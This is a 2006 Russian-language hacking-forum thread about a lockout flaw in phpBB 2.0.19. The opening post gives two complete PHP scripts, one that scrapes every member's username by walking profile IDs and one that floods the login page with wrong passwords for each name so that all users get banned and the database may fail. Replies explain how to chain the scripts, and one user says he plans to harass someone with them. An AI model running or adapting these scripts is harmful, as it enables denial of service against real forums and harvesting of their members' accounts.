ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в phpbb 2.0.19 возможно даже более ранние версии
  #1  
Старый 11.02.2006, 22:32
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию Уязвимость в phpbb 2.0.19 возможно даже более ранние версии

Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.
---------------
Автор: k1b0rg
---------------
Код:
<?
$host="Сайт";
$papka="Папка с форумом";
$port=80;
$number_users=2050;
$start=1;
set_time_limit(0);
$file="user.txt";
$file=fopen($file,*w*);
for($i=$start;$i<=$number_users;$i++)
{$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
$request.="Accept-Language: ru\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$request.="Host: $host\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n\r\n";
$sock=fsockopen("$host",$port,$errno,$errstr);
fputs($sock,$request);
while(!feof($sock))
{$str=fgets($sock);
if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>
Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле <title>Юзер - Lamer</title>
то переписываем preg_match как
preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return))
Сам сплоит
---------------
Автор: ASSCOL
---------------
Код:
<?
set_time_limit(0);
$host="Сайт";
$papka="Папка с форумом";
$file=fopen("user.txt",*r*);
while(!feof($file))
{
$str=fgets($file);
$str=trim($str);
for($i=0; $i<=5; $i++)
{
$request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
$request.="Referer: http://$host/$papka/login.php\r\n";
$request.="Accept-Language: ru\r\n";
$request.="Content-Type: application/x-www-form-urlencoded\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
$request.="Host: $host\r\n";
$request.="Content-Length: 73\r\n";
$request.="Pragma: no-cache\r\n";
$request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
$request.="\r\n";
$request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
$fp=fsockopen("$host",80,$errstr,$errno);
fputs($fp,$request);
fclose($fp); 
}
}
?>
--------------------------------
Нашел уязвимость ASSCOL.
--------------------------------
Статья взята с сайта http://comp-info.ru
 
Ответить с цитированием

  #2  
Старый 11.02.2006, 22:40
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

как могут быть уязвимы более ранние версии, если эта функция включена тока в 19-ую сборку
 
Ответить с цитированием

  #3  
Старый 12.02.2006, 15:16
gazta
Познающий
Регистрация: 16.10.2005
Сообщений: 38
Провел на форуме:
236836

Репутация: 9
По умолчанию

А с никами что потом делать?
 
Ответить с цитированием

  #4  
Старый 12.02.2006, 15:17
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

берешь первый скрипт, он вытягивает все ники с форума ,а потом их записываешь в файл user.txt и запускаешь второй сплойт
 
Ответить с цитированием

  #5  
Старый 12.02.2006, 15:51
FHT
Постоянный
Регистрация: 21.09.2005
Сообщений: 525
Провел на форуме:
2994394

Репутация: 547


Отправить сообщение для FHT с помощью ICQ
По умолчанию

Вешь прикольная, но смысла с нее помоему маловато =)
Разве что насолить плотно кому-то =)
Ох счас поиздеваюсь =)
Спасибо k1b0rg =)
 
Ответить с цитированием

  #6  
Старый 12.02.2006, 17:34
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

тот же DoS только изощренная форма
 
Ответить с цитированием

  #7  
Старый 12.02.2006, 18:16
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

Байан, никакой не АССОЛ это нашел) Об этом писали еще как тока эта фича вообще появилась
 
Ответить с цитированием

  #8  
Старый 12.02.2006, 18:38
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

2Zadoxlik
дай сцылку где писали
 
Ответить с цитированием

  #9  
Старый 12.02.2006, 19:55
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию

Цитата:
Сообщение от k1b0rg  
2Zadoxlik
дай сцылку где писали
Я щас не помню уже. по-мойму на myphpbb.com.ru или где-то в обсуждении короче этой версии. Речь зашла об этой блокировке и кто-то предположил что так можно банить, что собственно само собой разумеется.
Вообще непонятно, о чем девелоперы думают... Там по-мойму был какой-то патч, убирающий эту фигню
 
Ответить с цитированием

  #10  
Старый 12.02.2006, 20:04
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Ну а если человек ее сам нушол этот глюк, тогда что?
авторство сохранено, и удали плиз наши мессаги, чтобы во флуд не переросла тема
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Скрипт Perl: Узнавалка версии phpBB DetMyl PHP, PERL, MySQL, JavaScript 4 14.02.2006 00:48
Уязвимости в форумах phpbb до версии 2.0.13 *Van* Форумы 3 27.11.2005 00:43
XSS usercp_register.php phpBB 2.0.13 и более ранние версии XJIOP Форумы 14 16.04.2005 17:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ